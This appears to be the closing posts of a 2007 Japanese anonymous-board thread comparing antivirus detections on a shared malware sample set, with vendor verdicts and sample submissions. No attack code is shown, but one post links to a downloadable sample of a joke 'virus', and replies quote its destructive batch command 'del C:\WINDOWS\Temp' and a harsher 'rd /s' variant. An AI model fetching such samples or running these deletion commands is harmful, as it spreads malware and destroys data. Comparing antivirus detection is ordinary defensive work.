avast!(´;ω;`)シクシク
URLリンク(nekomimi.ws)
964:名無しさん@お腹いっぱい。
07/09/26 11:24:49
>>963
ウンコ発見
965:名無しさん@お腹いっぱい。
07/09/26 12:01:01
>>960
㌧
カスペ7
8/12 (5,6はヒューリスティック)
検体提出
detected: Trojan program Trojan-PSW.Win32.OnLineGames.dij File:0/51-70.pif//PE_Patch.PECompact//PecBundle//PECompact
detected: malware not-virus:Hoax.Win32.Avola.a File:1/setup.exe//PE_Patch.UPX//UPX
detected: Trojan program Trojan-Downloader.Win32.Agent.dlv File:3/mminstall.exe
detected: virus Heur.Invader (modification) File:5/ysydown.cab/ysydown.exe//ASPack
detected: virus Heur.Downloader (modification) File:6/player.exe//PE_Patch.UPX
detected: Trojan program Trojan-Spy.Win32.Agent.abv File:7/vip.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.dor File:8/gmsex.exe
detected: Trojan program Trojan-Downloader.JS.Agent.oq File:9/1.js//JSPack
966:名無しさん@お腹いっぱい。
07/09/26 12:23:07
>>960
AVG Anti-Malware
0\51-70.PIF
Trojan horse PSW.Lineage.AAV
1\setup.exe
Trojan horse SHeur.OGX
2\121.exe
Trojan horse Downloader.Generic6.HYO
3\MMINSTALL.EXE
Trojan horse Generic7.UAP
4\bf.htm
Downloader.Agent.fm
5\ysydown.cab
Trojan horse Downloader.Generic6.JJH
6\PLAYER.EXE
Trojan horse Generic8.AAX
7\VIP.EXE
Trojan horse Generic7.ZMC
8\GMSEX.EXE
Trojan horse Generic7.ZMG
9 a bはスルーしたので送ります
967:名無しさん@お腹いっぱい。
07/09/26 12:30:17
AVGすげー
968:名無しさん@お腹いっぱい。
07/09/26 12:33:58
>>960乙です
Norton Internet Security 2008
/1/setup.exeを Awola として検出
/2/121.exe Downloader として検出
/3/mminstall.exe Trojan.Farfli として検出
その他は反応無しなので贈っておきます
969:名無しさん@お腹いっぱい。
07/09/26 12:56:51
>>960
McAfee完全スルー
970:名無しさん@お腹いっぱい。
07/09/26 14:58:59
>>960
ウイルスバスター2007
51-70.pif
TSPY_WOWSTEAL.CN
ysydown.cab
TROJ_SMALL.IMH
vip.exe
TROJ_DELF.IVK
gmsex.exe
Possible_Infostl
残り検体提出します
971:名無しさん@お腹いっぱい。
07/09/26 16:09:21
>>960
んー、某資料室の人?
>>963
なんかハクられてね?
972:名無しさん@お腹いっぱい。
07/09/26 17:18:25
>>971
いんや、どこの人でもないよ
973:名無しさん@お腹いっぱい。
07/09/26 18:02:37
>>972
そか。McAfee使いで中華アカハックトロイばっかだったんで勘違いした。
974:名無しさん@お腹いっぱい。
07/09/26 20:37:34
>>960
ウイルスキラー
2\121.exe
Trojan.DL.Win32.Agent.zdy
7\vip.exe>>upack0.36
Trojan.Clicker.Win32.PopHot.bq
8\gmsex.exe
Trojan.PSW.Win32.QMOnline.a
975:名無しさん@お腹いっぱい。
07/09/26 20:55:42
次スレどこー??
976:965
07/09/26 21:08:56
>>960
カスペ2次報告
9(ほかに2は返事待ち)/11
: Trojan program Trojan-PSW.Win32.OnLineGames.dij File: 0/51-70.pif
: malware not-virus:Hoax.Win32.Avola.a File: 1/setup.exe
: Trojan program Trojan-Downloader.Win32.Hmir.ae File: 2/121.exe(検体提出による追加検出)
: Trojan program Trojan-Downloader.Win32.Agent.dlv File: 3/mminstall.exe
: malware Exploit.JS.Agent.am File: 4/bf.htm(検体提出による追加検出)
: Trojan program Trojan-Downloader.Win32.Delf.cfu File: 5/ysydown.cab/ysydown.exe (シグネチャに変更)
: virus Virus.Win32.AutoRun.pd File: 6/player.exe (シグネチャに変更)
: Trojan program Trojan-Spy.Win32.Agent.abv File: 7/vip.ex
: Trojan program Trojan-PSW.Win32.OnLineGames.dor File: 8/gmsex.exe
: Trojan program Trojan-Downloader.JS.Agent.oq File: 9/1.js
a/tools.js→返事待ち
b/spb40.exe→返事待ち
977:名無しさん@お腹いっぱい。
07/09/26 21:13:34
>>975
ここは、どうよ。
糞スレリサイクル。250レスほど余っている。
【NOD厨】検出力調査スレ2【出禁】
スレリンク(sec板)
それとも、新スレ立てた方がいいか?
978:名無しさん@お腹いっぱい。
07/09/26 21:24:33
>>977
そこは機能していない。放置でいいと思う。
こっちを再利用するのはいいと思う。
【信者】検出力調査スレ3【禁止】
スレリンク(sec板)
979:名無しさん@お腹いっぱい。
07/09/26 21:25:58
キング
0\51-70.pif Win32.Troj.Downloader.ph.110592
一匹
送っておいたお
980:名無しさん@お腹いっぱい。
07/09/26 22:19:04
>>978
そっちの方がいいかも。
981:名無しさん@お腹いっぱい。
07/09/26 22:37:24
>>954
(m´・ω・`)m ゴメン…
おいらが、先に送っちゃった
982:名無しさん@お腹いっぱい。
07/09/26 22:38:58
423 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/09/26(水) 22:06:25
****W32.DarkManko.F****
Winnyなどに出回っている
"めっちゃ臭いやん.avi exe"
というファイルを実行してしまうと感染。
画面上にDarkMankoが張り付きます
427 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/09/26(水) 22:23:25
W32.DarkManko.Fの検体入手しますた
URLリンク(up-sv.ath.cx)
983:名無しさん@お腹いっぱい。
07/09/26 22:41:21
>>978
こっちで良いと思う。多分>>977は荒らしで埋まる。
984:名無しさん@お腹いっぱい。
07/09/26 22:42:49
>>982
中身はバッチファイルで、
del C:\WINDOWS\Temp
しか書いてない。
985:名無しさん@お腹いっぱい。
07/09/26 22:44:59
del C:\WINDOWS\Temp
え?
986:名無しさん@お腹いっぱい。
07/09/26 22:46:32
Windowsぶっ壊れるぞ・・・
987:名無しさん@お腹いっぱい。
07/09/27 00:06:11
rd /s のほうがry
988:名無しさん@お腹いっぱい。
07/09/27 03:01:10
そもそも、DarkManko なんて名前付けないだろ……
989:名無しさん@お腹いっぱい。
07/09/27 03:15:04
ume
990:名無しさん@お腹いっぱい。
07/09/27 07:57:37
>>986
tempだからいいだろ消えても。
991:名無しさん@お腹いっぱい。
07/09/27 19:09:50
ume
992:名無しさん@お腹いっぱい。
07/09/27 19:11:13
grrrrrrrrrrr
993:965
07/09/27 20:12:05
>>960
>>976の追加報告
a/tool.js, b/spb.40.exeは「白」との返事
Hello,
tool.js_
No malicious code was found in this file.
Please quote all when answering.
Hello,
spb40.exe_
No malicious code was found in this file.
Please quote all when answering.
--
Best regards, Namestnikov Yury
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
URLリンク(www.kaspersky.com)
994:名無しさん@お腹いっぱい。
07/09/27 21:36:39
うめ
995:名無しさん@お腹いっぱい。
07/09/27 21:41:59
∧_ ∧ なにこのスレ
_ ( ´・ω・`) __
/ ( ( つ┳つノ \
/  ̄ ̄ ̄ ̄ ヽ
| / \ |
| ● ● |
| | ころころ~
ヽ (_人_) ノ
~~~~ ◎――――◎
996:名無しさん@お腹いっぱい。
07/09/27 21:42:57
γ''"""ヽ、
/ / ゚ ▼) W(`0`)W ガオォー
し' (,,゚Д゚)
ノ|(ノ |)
∠,,人,,_,,ノ
U"U
_, ,_ ?
997:名無しさん@お腹いっぱい。
07/09/27 22:50:59
可愛らしいけどume
998:名無しさん@お腹いっぱい。
07/09/27 22:53:06
,、‐ " ̄:::゙:丶、 ∩_
,r::::l3゙::::::::/ハヽ:ヽ::::、:ヽ〈〈〈 ヽ
{::://:::::::// ヽ\ト、::::::〈⊃ }
ヾ l:::::::/ \ `/ヾ ィ、:::| |
|;:r::| ●` ●ヾハ| |
ヽハ::::: :::レ / !
´\ ・ ,ノヽ / <これ
/ヾ ̄下~ |_/
/ヽ_ _\ .ィ ヽ/
/ n_n |
>、 /_ l゚ω゚| |
(___)  ̄ |
999:名無しさん@お腹いっぱい。
07/09/27 22:54:28
ウッキィー
1000:名無しさん@お腹いっぱい。
07/09/27 22:56:29
1000
1001:1001
Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。